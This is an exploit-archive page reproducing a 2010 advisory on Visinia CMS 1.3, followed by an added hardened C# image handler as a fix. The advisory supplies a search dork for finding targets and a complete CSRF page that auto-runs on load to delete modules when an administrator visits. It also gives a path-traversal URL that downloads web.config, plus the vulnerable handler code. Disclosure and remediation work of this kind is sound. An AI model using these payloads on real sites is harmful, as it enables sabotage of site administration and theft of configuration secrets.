<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Visinia 1.3 Multiple Vulnerabilities</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>====================================
Visinia 1.3 Multiple Vulnerabilities
====================================

Title : Visinia Multiple Vulnerabilities
Affected Version : Visinia 1.3
Discovery : www.abysssec.com
Vendor : http://www.visinia.com/
Download Links : http://visinia.codeplex.com/releases
Dork : &quot;Powered by visinia&quot;

Admin Page : http://Example.com/Login.aspx

Description :
===========================================================================================
This version of Visinia has multiple vulnerabilities:

1- CSRF for removing modules
2- LFI for downloading web.config or any file

CSRF for Removing Modules:
===========================================================================================

With this vulnerability, an administrator who visits a malicious site while already logged in
can be made to remove a module through a POST request to the server.

A request to this path removes the module:

http://Example.com/Admin/Pages/System/Modules/ModuleController.aspx?DeleteModule=True&amp;ModuleId=159

To remove other modules, only the ModuleId needs to change.

The source of the HTML page (malicious script) is:
--------------------------------------------------------------------------------
&lt;html&gt;
&lt;head&gt;
&lt;title &gt;Wellcome to My Site!&lt;/title&gt;
Hello!



This page remove Modules in Visinia CMS.

&lt;script&gt;
function RemoveModule() {
try {
netscape.security.PrivilegeManager.enablePrivilege(&quot;UniversalXPConnect&quot;);
} catch (e) {}

var http = false;
if (window.XMLHttpRequest) {
http = new XMLHttpRequest();
}
else if (window.ActiveXObject) {
http = new ActiveXObject(&quot;Microsoft.XMLHTTP&quot;);
}

url = &quot;http://Example.com/Admin/Pages/System/Modules/ModuleController.aspx?DeleteModule=True&amp;ModuleId=159&quot;;
http.onreadystatechange = done;
http.open('POST', url, true);
http.send(null);
}
function done() {
if (http.readyState == 4 &amp;&amp; http.status == 200)
{
}
}
&lt;/script&gt;
&lt;/head&gt;
&lt;body onload =&quot;RemoveModule();&quot;&gt;
&lt;/body&gt;
&lt;/html&gt;

--------------------------------------------------------------------------------

File Disclosure Vulnerability:
===========================================================================================

Using this path, the web.config file can be downloaded from the server.

http://Example.com/image.axd?picture=viNews/../../web.config

The downloaded file is named image.axd, but its content is the content of web.config.

Vulnerable Code is in this DLL : visinia.SmartEngine.dll
and this Method : ProcessRequest(HttpContext context)

--------------------------------------------------------------------
public void ProcessRequest(HttpContext context)
{
    if (!string.IsNullOrEmpty(context.Request.QueryString[&quot;picture&quot;]))
    {
        string fileName = context.Request.QueryString[&quot;picture&quot;]; // File name is taken straight from the URL
        string folder = WebRoots.GetResourcesRoot();
        try
        {
            FileInfo fi = new FileInfo(context.Server.MapPath(folder) + fileName);
            int index = fileName.LastIndexOf(&quot;.&quot;) + 1;
            string extension = fileName.Substring(index).ToLower();
            if (string.Compare(extension, &quot;jpg&quot;) == 0)
            {
                context.Response.ContentType = &quot;image/jpeg&quot;;
            }
            else
            {
                context.Response.ContentType = &quot;image/&quot; + extension;
            }
            context.Response.TransmitFile(fi.FullName); // Sends the file in the response without any check on the resolved path
        }
        catch
        {
        }
    }
}
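
Added example, not part of the original advisory or of the Visinia code base: one way to
harden the handler above by canonicalizing the requested path, confirming it stays inside
the resources folder, and serving only an allowlist of image types. SafeImageHandler,
AllowedExtensions and Reject are hypothetical names; WebRoots.GetResourcesRoot() is the call
shown in the listing above, and the allowed extensions are an assumption.

```csharp
using System;
using System.IO;
using System.Web;

public class SafeImageHandler : IHttpHandler   // hypothetical class name
{
    // Assumption: only these image types are ever served from the resources folder.
    private static readonly string[] AllowedExtensions = { ".jpg", ".jpeg", ".png", ".gif" };

    public bool IsReusable { get { return true; } }

    public void ProcessRequest(HttpContext context)
    {
        string fileName = context.Request.QueryString["picture"];
        if (string.IsNullOrEmpty(fileName)) { Reject(context); return; }

        // Canonical root with a trailing separator, so "Resources2" cannot pass as "Resources".
        string root = Path.GetFullPath(context.Server.MapPath(WebRoots.GetResourcesRoot()));
        root = root.TrimEnd(Path.DirectorySeparatorChar) + Path.DirectorySeparatorChar;

        string fullPath;
        try
        {
            // GetFullPath collapses "..", so viNews/../../web.config resolves outside root.
            fullPath = Path.GetFullPath(Path.Combine(root, fileName));
        }
        catch (Exception) { Reject(context); return; }   // malformed path characters

        string extension = Path.GetExtension(fullPath).ToLowerInvariant();
        bool insideRoot = fullPath.StartsWith(root, StringComparison.OrdinalIgnoreCase);
        bool allowedType = Array.IndexOf(AllowedExtensions, extension) >= 0;
        if (!insideRoot || !allowedType || !File.Exists(fullPath)) { Reject(context); return; }

        // Content type is chosen from the allowlist, never built from the request string.
        context.Response.ContentType = extension == ".png" ? "image/png"
                                     : extension == ".gif" ? "image/gif" : "image/jpeg";
        context.Response.TransmitFile(fullPath);
    }

    private static void Reject(HttpContext context)
    {
        context.Response.StatusCode = 404;   // same answer for every rejected request
    }
}
```

With this check, the picture=viNews/../../web.config request resolves to a path outside the
resources root and fails the extension allowlist, so the handler answers 404 instead of sending the file.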

# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-09-03]</pre></body></html>
Source: http://inj3ct0r.com/exploits/13957